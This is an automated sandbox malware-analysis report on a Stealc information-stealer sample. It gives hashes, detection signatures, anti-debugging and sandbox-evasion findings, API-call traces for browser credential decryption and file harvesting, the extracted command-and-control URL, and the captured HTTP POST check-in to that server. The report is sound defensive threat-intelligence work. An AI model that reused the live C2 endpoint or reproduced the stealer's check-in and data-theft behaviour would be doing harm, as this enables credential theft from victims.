Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1562132
MD5: 195eafa20236c52b744d7ff88ccf8dd6
SHA1: eb079dc207806442f57ef816f42f8b0a1835aa46
SHA256: 110760d0807d24cda6139d69aee2e1166753ad3ee33e4f9751f3c036903838b4
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7468 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 195EAFA20236C52B744D7FF88CCF8DD6)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware configuration: {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Yara matches (Source | Rule | Description | Author):
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000001.00000003.1332375323.0000000005490000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000001.00000002.1389080982.00000000016AE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 7468 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 7468 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched

Suricata IDS alerts (Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol):
2024-11-25T08:44:20.873510+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49710 | 185.215.113.206 | 80 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.206/c4becf79229cb002.phpft | Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpv9 | Avira URL Cloud: Label: malware
Source: http://185.215.113.206/d9 | Avira URL Cloud: Label: malware
Source: file.exe.7468.1.memstrmin | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E44C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E460D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E640B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E56960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E4EA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E49B80 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E56B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E49B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E47750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E518A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E53910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E51269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E51250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E5E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E5CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E523A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E4DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E52390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E4DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E54B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E54B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E5DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E5D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E416A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E416B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49710 -> 185.215.113.206:80
Source: Malware configuration extractor | URLs: http://185.215.113.206/c4becf79229cb002.php
Source: global traffic | HTTP traffic detected:
    GET / HTTP/1.1
    Host: 185.215.113.206
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    POST /c4becf79229cb002.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----IJECAEHJJJKJKFIDGCBG
    Host: 185.215.113.206
    Content-Length: 211
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Ascii:
    ------IJECAEHJJJKJKFIDGCBG
    Content-Disposition: form-data; name="hwid"

    2553E978FAD72284582127
    ------IJECAEHJJJKJKFIDGCBG
    Content-Disposition: form-data; name="build"

    mars
    ------IJECAEHJJJKJKFIDGCBG--
Source: Joe Sandbox View | IP Address: 185.215.113.206
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.206 (reported 7 times)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E46C40 lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,lstrcpy
Source: unknown | HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1 (identical headers and multipart body to the POST listed above: hwid=2553E978FAD72284582127, build=mars)
Source: file.exe, 00000001.00000002.1389080982.00000000016AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000001.00000002.1389080982.0000000001708000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000001.00000002.1389080982.0000000001708000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/H
Source: file.exe, 00000001.00000002.1389080982.0000000001708000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: file.exe, 00000001.00000002.1389080982.0000000001708000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php&
Source: file.exe, 00000001.00000002.1389080982.0000000001708000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpF
Source: file.exe, 00000001.00000002.1389080982.0000000001708000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpR
Source: file.exe, 00000001.00000002.1389080982.00000000016AE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpft
Source: file.exe, 00000001.00000002.1389080982.0000000001708000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpv9
Source: file.exe, 00000001.00000002.1389080982.0000000001708000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/d9
Source: file.exe, 00000001.00000002.1389080982.0000000001708000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.206/ws
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E49770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,Sleep,CloseDesktop

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0120911D
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E648B0
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0120C8AC
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_01246097
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_011300F7
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_01202B2C
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0120ABA1
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_011FD3C1
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_011DBA50
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_01168AE9
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_010F4D90
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_012075EC
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0120FCE5
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0117877A
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_012117CB
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_01203FD9
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_011FEEA9
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00E44A60 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: olrcobvx ZLIB complexity 0.9947689559108527
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E63A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00E5CAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\2XZNUO5Y.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: file.exe | Static file information: File size 1823232 > 1048576
Source: file.exe | Static PE information: Raw size of olrcobvx is bigger than: 0x100000 < 0x1a3400

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 1.2.file.exe.e40000.0.unpack :EW;.rsrc:W;.idata :W; :EW;olrcobvx:EW;fyiwyewh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;olrcobvx:EW;fyiwyewh:EW;.taggant:EW;
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00E66390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00E66390
